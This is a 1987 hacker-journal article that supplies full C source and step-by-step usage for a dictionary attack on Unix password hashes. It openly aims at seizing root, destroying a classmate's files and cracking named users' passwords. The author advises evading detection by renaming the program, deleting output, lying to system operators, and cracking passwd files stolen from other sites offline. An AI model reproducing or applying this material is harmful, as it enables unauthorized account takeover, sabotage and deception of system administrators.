The LOD/H Technical Journal: File #6 of 10 A Discreet Unix Password Hacker ------------------------------- By Shooting Shark / Tiburon Systems 4 Mar 87 Imagine this familiar situation: you have an account on a Unix system. Perhaps it's your account on your school's VAX, or an account you've hacked yourself. You'd like to collect more passwords to this system - perhaps to the 'root' or 'bin' accounts so you can take control of the system, or the password of the class hotshot who's going to get an 'A' on his compiler project and upset the curve unless you go in and erase all of his files. The problem is getting these passwords. The most obvious method would be to manually enter login/password combinations until you found one. This is slow (>10 seconds per try), will give you sore fingers, and multiple invocations of the 'login' program may be noticed. You could write a program on your micro to dial up the site (*if* it has a dialup) and try passwords from a login/password pool, but this is just as slow, ties up your computer and your phone line, and again is subject to easy detection. The solution to this problem is to have the system itself hack passwords for you. It can do this unattended and at a considerable speed while you go about your life, and will be difficult to detect by system demigods. Here is the C source for my program. Upload it to your Unix site and compile it. --- cut here --- /* * hpw.c v1.4: 8 October '86 * Written by Shooting Shark / Tiburon Systems * */ #include #include #include #include struct passwd *pwd, *getpwname(name); int len, abort(), endpwent(); char crbuf[30], *strcpy(), *crypt(), *getpass(), *getlogin(), *pw, pwbuf[10]; main(argc, argv) int argc; char *argv[]; { FILE *fopen(), *fp; char *uname; signal(SIGINT,abort); if (argc !=3) { printf("usage : %s username pwfile\n",argv[0]); exit(-1); } if (!(pwd =getpwnam(argv[1]))) { printf("unknown user : %s\n",argv[1]); exit(-1); } if ((fp = fopen(argv[2], "r")) == NULL) { perror(argv[2]); exit(-1); } sprintf(crbuf,"%s",pwd->pw_passwd); printf("hacking %s\n",argv[1]); printf("encrypted password : %s\n",crbuf); while (fgets(pwbuf, 20, fp) != NULL) { pwbuf[strlen(pwbuf)-1] = '\0'; pw = crypt(pwbuf,crbuf); if (!strcmp(pw,crbuf)) { printf("%s ==> %s\n",argv[1],pwbuf); exit(0); } } printf("done -- password not found.\n"); endpwent(); } abort() { printf("aborted while trying '%s'\n",pwbuf); exit(-1); } --- cut here --- (Note - written on a Pyramid 90x running Berzerkeley Unix 4.2. If you're running SysV or something else you may have problems. You probably won't, but you might.) Now that you have the above compiled into a file called 'hpw,' invoke it with % hpw username pwfile ( % is the shell prompt; don't type it...) where username is the login name of the user who's password you'd like to hack, and pwfile is the path of a text file that contains the pool of likely passwords. Most sites will have a file of words for the 'spell' spelling checker - it will probably be /usr/dict/words and contain at least 15,000 potential passwords. Hpw starts by loading the user's encrypted password from /etc/password and stores it in crbuf. It then starts reading words from the file you've specified, encrypts them using the crypt() routine, and compares them to the encrypted password. If they match, the program outputs a line like: 'shark ==> hispassword' and quits. If they don't match, it goes on to the next potential password. If the program goes through the entire list and doesn't find the correct password, it prints 'done -- password not found' and quits. If you hit ^C (or BREAK, or whatever your interrupt character is) the program tells you which word in the file it had gotten to when it was interrupted and quits. Then, the next time you attempt to hack that login name, you can start where you left off during the previous session. The beauty of this program is that you can run it in background with the output sent to a file and then log off, or play rogue, or whatever. To hack melody's password using /usr/dict/words as your pool file, and to have all messages generated by the program sent to a file called 'out.file' and run the program in background, you'd enter from csh: % hpw melody /usr/dict/words > out.file & the & signifies a background process. The system will print something like: [1] 90125 this means it's job number 1 for you, and has process id 90125. To bring the program back into the foreground, enter: % %1 and to kill the process, type % kill 90125 if you have hpw running in background and you're in csh, you can just log off and the program will continue to silently gather passwords. If you're under the sh shell, you'll need to run the program with 'nohup' (read the man entry for more info) or sh will kill the process when you log out. Anyway, after you've given the program sufficient time to go through the list (more on this in a second), log in again. If the output file exists, the program has completed its job. Otherwise use 'ps' to see if the program is still running. cat the file and you'll see something like this: hacking melody encrypted password : K4h7iidD1vX0a melody ==> joshua (or 'done -- password not found') make a note of melody's password, rm the incriminating output file, and move on to the next login name. Easy, huh? Now for the bad news: The designers of Unix weren't stupid. They deliberately designed the crypt() routine so that it's unique (it's a minor deviation of the DES, so you can't use a fast DES-busting program to attack the /etc/passwd file). This program uses the fastest possible method of brute-force hacking Unix passwords, but it isn't too speedy itself. I wrote the program on a Pyramid 90x, which is a 32-bit multi-processor RISC-architecture machine. When running this program in foreground while I was the only user on the system, it averaged 2 seconds per try. You can expect this performance on one of the better VAXen. If you're on a Cray (sure...) it might take the program 1/8 second per hack. If you're on an AT running XENIX or a PDP-11/44, expect 5 seconds per try. (I really don't know how long it would take, why don't some people time it and give me feedback...I'd appreciate it.) Realistically, if you're using the system's spelling-checker word list that contains 20,000 words and you're running the program in background, give it at least 12 hours. If you have a system operator who likes to keep track of people's long-running jobs, tell them via mail that you'll be computing the limit of 1/x to infinity or something like that and they'll leave the process alone. If you have your own file of 100 probable passwords (such as 'joshua,' 'secret' or the person's name) it will take 10 minutes or so to complete. Sensible selection of potential passwords (most UNIX systems don't allow passwords of less than 5 characters; attempt to change your password to progressively shorter and shorter words until you find out what your system's minimum length is) and running the program at strategic times (like after midnight) will cut the time down. Hackers who know 'C' (and everybody should know C by now; it's the best language ever designed) will want to modify the program I've presented. You may want to 'hard code' the username to be hacked and the pwfile path; 'progname root word.file' on a process table might look a LITTLE suspicious to snoopy system operators (and it goes without saying that you shouldn't call the program 'hack' or 'hpw', nor leave the source unencrypted in your directory). Also, since the crypt() routine is universal, you can hard-code the 'crbuf' variable with the encrypted password (from /etc/passwords) of a user on another system! When hardcoding a password, make sure you spell it correctly, and that it contains exactly 13 characters of upper & lower case, and/or numbers. I once successfully hacked the root account of an AT&T Micro in Michigan on my local Pyramid 90x. Thus I didn't need to take up space on the guy's file system with the source and didn't have to run the program on his slow system - once I obtained the 6300's /etc/passwd file from the person who hacked into the system, I attacked it at my local site. If you happen to have a system of your own that runs Unix, you can hack any system's root account at home, completely risk-free. Unix is the best operating system I've ever used. It's immensely powerful; as demonstrated by the program above, it's easy to make the system work for you. If you have any questions, comments, criticisms, threats, etc, get in touch with me - my primary goal is not to prove that I'm more of a Unix Wizard than the other guy, but rather to do my part in the ongoing crusade to make forbidden information available to the people who can use it. 'Knowledge is Power,' as the saying goes. -- Shark.